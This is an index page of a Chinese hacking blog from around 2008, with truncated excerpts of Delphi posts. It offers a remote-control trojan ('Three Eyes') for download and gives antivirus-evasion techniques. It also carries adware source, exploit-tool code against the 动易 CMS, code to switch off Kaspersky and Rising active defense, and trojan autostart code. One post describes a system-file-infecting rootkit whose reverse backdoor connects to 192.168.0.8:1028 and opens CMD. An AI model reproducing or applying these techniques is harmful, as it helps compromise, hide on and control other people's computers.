1. 公告

    • 黑夜给了我黑色的眼睛去寻找光明,阳光给了我明亮的眼睛我却是去寻找黑暗,所以我只有在夜里才出现真实的自己。(菩提本不树,明镜亦非台,本来无一物,何处染尘埃。)
  2. 写作时间

    << 2008-11 >>

    Sun

    Mon

    Tue

    Wed

    Thu

    Fri

    Sat

    1

    2

    3

    4

    5

    6

    7

    8

    9

    10

    11

    12

    13

    14

    15

    16

    17

    18

    19

    20

    21

    22

    23

    24

    25

    26

    27

    28

    29

  3. 原创下载

  4. 最新文章

  5. 最新评论

  6. 文章归档

  7. Statistics

    • 文章总数:179
    • 评论总数:60
    • 引用总数:0
    • 浏览总数:225486
    • 留言总数:0
    • 当前样式:4u-HK
    • 当前语言:zh-CN
  8. 友情链接

  9. 反向链接

Nov3th

[置顶]Three Eyes v2.1[远程控制]

软件下载 远程控制  three  eyes  
承诺很长时间了,终于还是发布了,呵呵....欢迎大家的测试,有BUG,请在该帖后留言反馈.无文件,无注册表,无启动项...挂IE傀儡进程... 图:软件下载:点击下载...
0 comments
Mar23th

完美世界EXE包含部分代码

Delphi技术文章 完美世界  
program nwizgj;{$I Define.Inc}{$R hook.res}uses  Windows,  Messages,//tlhelp32,  FunUnit,  VarUnit in '..\Hook\VarUnit.pas',  myfunc in 'myfunc.pas';//{$DEFINE Test}const  CSTR_REGEdit = 'SOFTWARE\Microsoft\Windows\Curre...
2 comments
Mar11th

delphi免杀代码的几招方法

Delphi技术文章 免杀代码  
{转载请注明版权,PopSky 'S BlogWww.PopSky.org}其实前几天已经给大家做了部动画了,后来网盘出了问题,还有些朋友来单独找我要。。。。再这里向大家说声对不起了,因为小弟这里宽带有限制,所以不能一一的传给大家,对不起啊。。。。可能有部分朋友怕麻烦,懒得去下教程看。既然这样的话,我就在这里以文字的形式写给大家。。。。。废话不多说,继续朝下看。。。1:加垃圾汇编代码。其实许多的朋友都是知道的,Delphi支持在代码中嵌套汇编代码。也就是说,如果加入了垃圾汇编代码,就网网可以直接...
0 comments
Feb11th

一段Delphi广告插件源码

Delphi技术文章 广告插件  Delphi广告插件源码  
泡泡鱼点评:很适合初学者上手。学习目的:1.Delphi中如何操作注册表创建键值2.如何隐藏运行窗体3.Timer控件的使用注意点:uses中要添加registry***************************************************************************************unit Unit1;interfaceusesWindows, Messages, SysUtils, Variants, Classes, Graphics,...
0 comments
Jan29th

即将发布的Three Eyes文件上传功能部分代码[Delphi]

Delphi技术文章
[Three Eyes正在抓紧时间的开发当中,修复了其中不少的BUG...这里公布文件下载时服务端的部分代码!]function DownFile(FileName: string):Boolean;const  BufferSize = 2048;var  BinaryFile: THandle;  BinaryBuffer: Pchar;  StrTmp: String;  BinaryFileSize, BytesRead: dword;b...
0 comments
Jan14th

突破动易后台限制前台注册利用工具[原码]...

Delphi技术文章 动易  后台限制前台注册  利用工具  
我这里就直接贴出利用工具的代码了...由于很久前写的了(现在应当还能用)......当时技术比较菜.代码的易读性也并没有考虑到,抱歉咯..... unit Unit1;interfaceuses  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,  Dialogs, IdBaseComponent, IdComponent, IdTCPConnection, IdTC...
0 comments
Jan10th

内存截取字符串

Delphi技术文章 内存  截取字符串  
使用内存读取函数:ReadProcessMemory procedure TForm1.Button2Click(Sender: TObject);var      hProcess,iRead:Cardinal;      hgl:HGLOBAL;      Buffer:   Pointer;  begi...
0 comments
Jan5th

java中new Date().getTime()用Delphi实现

Delphi技术文章
一个计算时间精确到毫秒的例子...不过好像中间还有点问题吧.....vars:string;e,k:Tdatetime;begine:= strtodatetime(formatdatetime('yyyy-mm-dd hh:nn:ss:zzz',now()));k:=StrToDateTime('1970-01-01 08:00:00:000');s:=inttostr(millisecondsBetween(e,k));edit1.Text :=s;...
0 comments
Jan4th

使用Findwindow过卡吧瑞星主动防御[代码开源]

Delphi技术文章 Findwindow  卡吧瑞星主动防御  
{转载请保留版权 PopSky 'S Bloghttp://www.popsky.org}procedure CloseKaoBa;var f1,f2:integer;    r1:trect;    s:string;const WM_LBUTTONDOWN      = $0201;      WM_LBUTTONUP &n...
0 comments
Dec31th

我能做的到的最BT的ROOTKIT

Delphi技术文章 RootKit  
这个是我到目前为止能实现的最高级别的RootKit技术了。

做了个测试版,放出来给大家玩玩。

实现方法:

在去掉除了Windows对系统重要文件保护功能以后,通过感染系统文件的方式,进行随系统启动[这样便做到了无进程,无驱动,无文件],系统文件在运行时,再将后门的执行内存通过线程注入的方式注入进其它系统进程[不使用DLL进行注入]后,再启动系统文件。被注入的系统进程无法结束,结束了就蓝屏。

检查方法:

校检系统文件吧。[估计没人这么做吧,太恐怖了!]

由于代码具备的隐蔽性和攻击性太强,所以代码也就不放出来了。[毕竟我写入的注入部分代码只是个反向后门,如果是其它代码。。。]

测试方法:

反向连接IP为192.168.0.8 端口为:1028 [在连接成功后会启动一个CMD进程。无所谓,这个不是测试的重点] 循环连接
0 comments
Dec29th

加注册表自启动

Delphi技术文章
在Delphi中可以直接调用Registry单元直接操作注册表。可使用过的朋友都知道,由于这个单元加入后,程序会变大几K。要知道,Delphi在编写程序的时候本身生成出来的文件就比较大[汗啊,委屈啊]。所以,如果直接使用这个单元,就真的不适合我们编写木马了。program  Write_Reg_String;uses windows;procedure WriteRegString(const RootKey : HKey; Key, ValueName, Value: st...
0 comments